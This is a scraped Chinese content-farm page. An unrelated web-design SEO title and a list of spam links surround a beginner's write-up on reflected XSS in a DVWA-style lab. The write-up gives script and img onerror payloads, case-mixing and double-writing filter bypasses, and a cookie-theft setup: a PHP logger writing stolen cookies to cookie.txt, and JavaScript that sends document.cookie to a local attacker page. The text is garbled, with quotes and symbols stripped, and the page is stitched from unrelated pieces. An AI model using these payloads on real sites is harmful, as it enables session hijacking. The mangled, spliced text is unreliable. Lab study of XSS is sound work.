当前位置: 首页 > news >正文

天津响应式网站设计怎么做网站维护宣传

天津响应式网站设计,怎么做网站维护宣传,做电子板报的网站,宁波专业建站xss#xff0c;反射型#xff0c;lowmedium low发现xss本地搭建实操 medium作为初学者的我第一次接触比较浅的绕过思路high low 发现xss 本关无过滤 scriptalert(/xss/)/script //或 scriptconfirm(/xss/)/script //或 scr… xss反射型lowmedium low发现xss本地搭建实操 medium作为初学者的我第一次接触比较浅的绕过思路high low 发现xss 本关无过滤 scriptalert(/xss/)/script //或 scriptconfirm(/xss/)/script //或 scriptprompt(/xss/)/script出现弹框则存在xss其中alertconfirm(prompt(为弹框函数 本地搭建 在www目录下放置cookie.php内容如下 ?php$cookie$_GET[cookie];//将get请求参数存储到cookie变量中file_put_contents(cookie.txt,$cookie);//把偷取的用户cookie写到cookie.txt文件中。?js代码如下 scriptdocument.locationhttp://127.0.0.1/cookie.php/?cookiedocument.cookie;/script//document.location将页面的内容指定到指定位置。再在www目录下放置cookie.txt文件用于存放盗取的cookie 实操 目前txt文件什么也没有我们执行js代码 没有报错解析成功可以看到url地址栏中有用户的cookie此cookie已经储存进了攻击者的txt文件盗取成功 medium 关对 作为初学者的我第一次接触比较浅的绕过思路 Xss反射型 一判断是否存在xss 1:无过滤 使用弹窗函数编写js代码成功弹框 输入其他标签(未知领域) 输入img srcx οnerrοralert(/xss/)成功弹窗 3那尝试使用大小写混淆 4:或者双写绕过 sc 5还有很多方法自己探究吧相信在以后会掌握更多方法 二Js代码如下 三盗取cookie 本地www目录下搭建cookie.php 内容如下 ?php $cookie$_GET[cookie];//将get请求参数存储到cookie变量中 file_put_contents(cookie.txt,$cookie);//把偷取的用户cookie写到cookie.txt文件中。 ? 再创建cookie.txt文档用于存储盗取的cookie high 尝试别的语言就可以执行 img src1 onerroralert(1)
http://www.hkea.cn/news/14570290/

相关文章:

  • 网站站点建设银行招聘门户网站
  • 标准网站是哪个数据展示网站
  • wordpress 全站备份电商设计素材网站有哪些
  • 一般去哪个网站做写手椒江区建设局网站
  • 有成功案例的网站上不了国外网站怎么做外贸
  • 江西省城乡建设厅网站查询证件中国采购与招标网官方网站
  • 登陆网站密码不保存怎么做织梦网站每天被挂马
  • 新城镇建设官方网站网站自动更新时间代码
  • 鄂州英文网站建设成都网站建设工作室
  • 利用php做网站教程成都网站建设案例单招网
  • 电子商务网站建设实训报告主要内容wordpress 相关插件
  • 500m网站页面模板不包括
  • 阳山网站建设教育培训机构报名
  • 网站 图片切换常州网站推广软件
  • discuz做商城网站江苏城乡和住房建设厅网站
  • 在线做英语题的网站中国建设银行注册网站
  • 网站的弹窗广告怎么做企业做网站需要注意什么
  • 北京网站建设 app推销
  • 杭州百度百科seo到底是什么
  • 网站建设与管理主要学什么傻瓜式免费自助建站系统
  • 上海做企业网站的公司龙华网站公司
  • 100个免费推广网站黄冈商城网站制作哪家好
  • 北郊网站建设用xampp搭建wordpress
  • access2003做网站手机h5案例 网站
  • 石狮网站定制网站被黑客攻击怎么办
  • 口味王网站建设的设计方案河南省建设厅官方网站李学军
  • 上海做网站的的公司现代营销手段有哪些
  • 做一个简单的网站wordpress 外链播放器
  • 网站建设公司的工资惠阳网站建设公司
  • 爱媛直播优化大师是什么软件